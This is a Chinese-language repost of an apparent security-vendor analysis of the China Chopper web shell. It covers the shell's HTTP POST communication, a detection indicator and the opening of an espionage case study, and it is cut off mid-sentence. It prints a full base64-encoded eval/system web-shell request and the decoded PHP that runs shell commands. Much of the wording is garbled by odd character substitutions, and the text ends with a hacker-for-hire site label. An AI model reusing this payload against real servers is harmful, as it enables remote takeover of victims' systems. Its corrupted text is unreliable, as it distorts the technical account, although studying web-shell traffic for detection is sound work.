曩昔发现的要挟常常会跟着时刻的推移而逐步退出于公众视界中，但China Chopper却坚持了持久的生命力。 在曩昔两年的时刻里，思科Talos团队观察到China Chopper很多活动的踪影，有数个要挟安排将China Chopper融入到其举动中，这表明，即便距China Chopper初次发现现已过了九年，对部分要挟行为者而言它却仍然能起到要害的效果。本文将挑选其间最活泼的三次举动来剖析。 China Chopper是一种web shell，能让进犯者经过包含操控方针所需一切逻辑的客户端应用程序保存对受感染体系的拜访权限。 China Chopper是广泛可用的，简直任何人都可以运用它。这也意味着，仅以China Chopper的存在作为方针，简直不或许将进犯归咎于某个特定集体。 China Chopper的“返老还童”也直接说明晰许多看似老旧要挟永久不会真实消失，互联网的防御者们不应当只把目光放到一些新的歹意软件上。 什么是China Chopper？ China Chopper是一类东西，答应进犯者长途操控方针体系，条件是体系需求运转web服务器应用程序。Web shell可以在不同的渠道上运转，但在本例中，咱们只重视受感染的Windows主机。China Chopper已被证明由一些国家支撑的要挟集体，如Leviathan、Threat Group-3390等在运用。 在研讨中咱们发现，Internet Information Services (IIS)和Apache web服务器都受到过China Chopper web shell的进犯。咱们没有关于web shell是怎么装置的信息，可是考虑到有一些web应用程序结构，比方老版别的Oracle WebLogic或WordPress，它们傍边包含的长途代码履行缝隙或许使自己成了进犯方针。 China Chopper为进犯者供给了一个简略的GUI，答应他们装备到服务器的链接，并生成服务器端代码，这些代码有必要添加到方针网站的代码后才干进行通讯。 图1.China Chopper GUI 服务器端代码十分简略，只包含一行代码，依据应用程序渠道的不同有所改动。后门支撑.NET Active Server Pages或PHP。 以下是受感染的PHP应用程序的服务器端代码示例： 咱们并不能确认，服务器代码的如此简略是否是China Chopper开发人员为了添加检测的难度而故意为之，可是在短代码片段上运用形式匹配或许会发生一些误报。 China Chopper客户端运用HTTP POST恳求与受感染的服务器通讯。服务器端代码的仅有功用是评价在客户端GUI中装备服务器代码期间指定的恳求参数。在咱们的示例中，预期的参数名称是“test”。经过HTTP的通讯，可以很简单在捕获 *** 数据包后发现。 China Chopper包含一个长途shell（虚拟终端）功用，它首要会主张运用指令 'netstat an|find "ESTABLISHED."'，在受感染体系上的进程创立日志中很或许会看到此指令。 图2.China Chopper首要主张的终端指令 当咱们剖析捕获的数据包时，可以看到参数“test”包含另一个eval句子。 依据该指令，客户端将提交必定数量的参数，z0一直到zn。在提交之前，一切参数都运用规范base64编码器进行编码。参数z0一直包含解析其他参数、发动恳求的指令并将成果回来给客户机的代码。 带参数的编码China Chopper POST恳求： test=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XHhhbXBwXGh0ZG9jc1xkYXNoYm9hcmRcIiZuZXRzdGF0IC1hbiB8IGZpbmQgIkVTVEFCTElTSEVEIiZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D 在此恳求中，解码的参数是： z0 - @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c "{$s}"":"/c "{$s}"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?" ret={$ret} ":"";;echo("| 指令的结尾“&echo [S]&cd&echo [E]”好像出现在一切虚拟终端恳求中，可以作为一个牢靠的指示器来检测数据包捕获或行为日志中的China Chopper活动。 除了终端，China Chopper还包含一个文件管理器(可以创立目录、下载文件和更改文件元数据)、一个数据库管理器和一个根本的缝隙扫描器。 下面是咱们对三次举动的论说，它们别离有不同的方针、东西、技能及（或许不同的）要挟团伙。 图3.观察到的事例研讨的时刻表 事例研讨1：针对亚洲 *** 安排的特务举动 咱们在几回特务活动中确认了China Chopper的运用情况，其间一次针对亚洲 *** 安排的举动中，China Chopper被用于内部 *** ，装置在了一些用于存储秘要文档的Web服务器[1][2][3]黑客接单网